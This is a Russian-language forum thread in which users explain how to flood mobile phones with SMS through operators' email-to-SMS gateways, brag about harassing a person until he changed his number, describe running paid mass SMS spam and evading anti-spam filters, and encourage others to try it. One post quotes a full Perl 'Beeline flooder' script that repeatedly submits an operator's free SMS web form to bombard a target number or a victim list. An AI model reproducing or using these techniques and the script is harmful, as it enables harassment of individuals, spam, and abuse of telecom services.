Можно зафлудить телефон смсками очвень даже просто!!! Но не у всех операторов это возможно!!! У нас в Татарстане есть сотовый оператор ТАТИНКОМ, оффициальный сайт которого tatincom.ru и у его абонентов есть возможность отправлять письма на е-мэйл с мобильного телефона ))) Попробовал я отправить письмо на свой ящик... При чте нии письма адресс отправителя был типа [email protected] Потом я отправил на этот ящик письмо (для проверки того, куда придёт это письмо) и оно разделилось на множество смсок... За один раз мне на сотик пришло 142 смски Потом я попробовал отправить длинное письмо... пришло тоже 142 смс-ки Я подумал, что более 142-х смсок не получится отправить, т.к. у почтового ящика не хватает памяти!!! Потом я попробовал отправить 2 больших письма и пришло 284 смски... Из всего этого сделал вывод, что просто стоит защита от флуда!!!! Потом я пробовал отправлять на биллайн... Тоже получалось!!! Адресс вроде был [email protected] Ну вообще это всё, что я хотел написать!!! Потренеруйтесь с этим на своих операторах... может тоже прокатит )))
Это не бред!!! я сам лично флудил сотовые аппараты!!!правда они теперь поставили защиту от спама-- не больше 5 смс с одного адресса в день!!! или же проверяют тему письма.. если одна и таже.. то через 5 смс- блок!!!правда точно не могу говорить на счёт России ... но раскажу как при помощи СМС флуда я зарабатывал деньги!!! итак... для начала мне необходимо было научиться отправлять смс на все соторые телефоны в республике- фактически спам!! попробовал смс бомбер... короче один опкос как обнаружил что идёт спам- сразк же меня отрубил((( а учитывая тот факт что одно письмо отправлялось доолго... а обанентов под 600 000.. спам бы неделю занял.. не подходит!!! в голову пришла новая идея!!! отправлять спам с сотового аппарата.. корче я покупал 5 симок с вип пакетом (каж- 80 еу!!).. это мне позволяло отправлять скомько дуще угодно смс не оплачивая их!!!, подключал сотки к компам... и при помощи экселя в котором я составил номеры всех тел республики , и помощи программы (кажись мобил навигатор) я распределял равномерно все номера меж всеми 5-ю телефонами.. и жал- отправить.. за сутки- все абоненты Узбекистана получали от меня смс... и юридически я был не прикасаем- ведь у меня на руках договор в вип пакетом- где черным по белому написанно что я имею право куда угодно и сколько угодно слать смс)))...далее я находил клиента.. который мне платил за спам как за рекламму!!))) за 5 дней такого спама я брал 1000 уе!!! и платят!!!... далее когда спам кончался.. я брал симки.. щёл в опкос- и разрывал договор!!! они мне выплачивали не отработанные мною деньги.. короче при затратах 50 уе.. я брал 1000..... таким макаром я флужу и спамлю!!!! на счёт влуда через почту.. то у некоторых есть защита проверкой текста.. если тект совпадает с преведущей смс.. то его не принимает!!!.. это обходилось всё при помощи мейл бомбера на перле... когда он слал что то типа- сообщение1... сообщение2... сообщение3.... так что флуд сотового вполне реальная вещь- но вот только вопрос- зачем она!?.. а вот спам может принести вам деньги!!!))) дерзайте)))))))))..........
Я до такой степени зафлудил один телефон одного чела, у которого его номер знало много человек и поэтому он в жизни не хотел его менять, что пришлось ему этот номер сменить )))
всё просто.. они не предусматрели эту возможность в договоре.... я работаю в юридической фирме... и поверте- юридически я был прав!!!!))) я заплатил за вип.. а это значит кому хочу..что хочу.. и сколько хочу..шлю смс!!))) тут праблемма в том, что налоговая наезды устраиваит!!!!((( но как решать претензии от налоговой- это уже тема не этого раздела!!!!))))))
8066*******@sms.jeans.net.ua вот так можно отсылать СПАМ на ДЖИНС номера, а вот какой программой это делать?
Какой программой??? Просто попробуй написать большое письмо со своего ящика на этот ящик и оно разделится на множество смсок )))
вы про этот?)) Code: #!/usr/bin/perl use LWP::UserAgent; if(@ARGV < 2) { print qq( .:: Skides DiGiTaL Security ::. ------------------------------------ Beeline flooder by rav3n ([email protected]) Usage: perl beeflood.pl [options] Sample: perl beeflood.pl -p:3 -t:1234567 -n:10 Sample: perl beeflood.pl -s:victim.txt -n:10 options: -p:[ARG]prefix of number -p:3 - Beeline 903, 095 -p:6 - Beeline 905 -p:14 - Beeline 906 -p:17 - Beeline 909 -p:18 - Beeline 960 -p:7 - NC GSM, 865 -p:8 - NC GSM, 902 -p:9 - NC GSM, 878 -p:11 - NC GSM, 903 -p:12 - NC GSM, 905 -p:19 - NC GSM, 906 -p:20 - NC GSM, 909 -p:10 - EXTEL GSM, 902 -p:13 - EXTEL GSM, 905 -p:21 - EXTEL GSM, 909 -p:15 - Dal Telecom, 902 -p:16 - Dal Telecom, 904 -p:22 - Dal Telecom, 909 -t:[ARG] phone number (without prefix) -n:[ARG] number of messages -s:[ARG] filename with victims (prefix:phone) ); exit 0; } for($i=0;$i<=$#ARGV;$i++) { if($ARGV[$i] =~ /-p/) { ($null,$prefix) = split(":",$ARGV[$i]); } elsif($ARGV[$i] =~ /-t/) { ($null,$phone) = split(":",$ARGV[$i]); } elsif($ARGV[$i] =~ /-n/) { ($null,$num) = split(":",$ARGV[$i]); } elsif($ARGV[$i] =~ /-s/) { ($null,$victimfile) = split(":",$ARGV[$i]); } } $ua = new LWP::UserAgent; $ua->timeout(10); $req = HTTP::Request->new(POST => "http://www.beonline.ru/portal/melody_logo/bin_cont.sms/bin_logo_free.sms"); $req->content_type ('application/x-www-form-urlencoded'); if($victimfile) { open(MSG,"$victimfile") || die("bad file name $victimfile"); } for($i=1;$i<=$num;$i++) { if($victimfile) { get_file_data(); } $req->content ("phone_prefix=$prefix&phone7=$phone®ister=/images/btn/btn_send.gif"); $l = $ua->request($req)->as_string; print "$i prefix-phone [$prefix-$phone] MESSAGE IS SEND!\n"; } sub get_file_data() { $msg = <MSG>; unless($msg) { seek(MSG,0,0); $msg = <MSG>; } $msg =~ s/\r//g; $msg =~ s/\n//g; ($prefix,$phone) = split(":",$msg); }
m0nzt3r да только про мультипоточный а чо это слабоват нам показался Кстати у меня идея есть по флуду мтс'а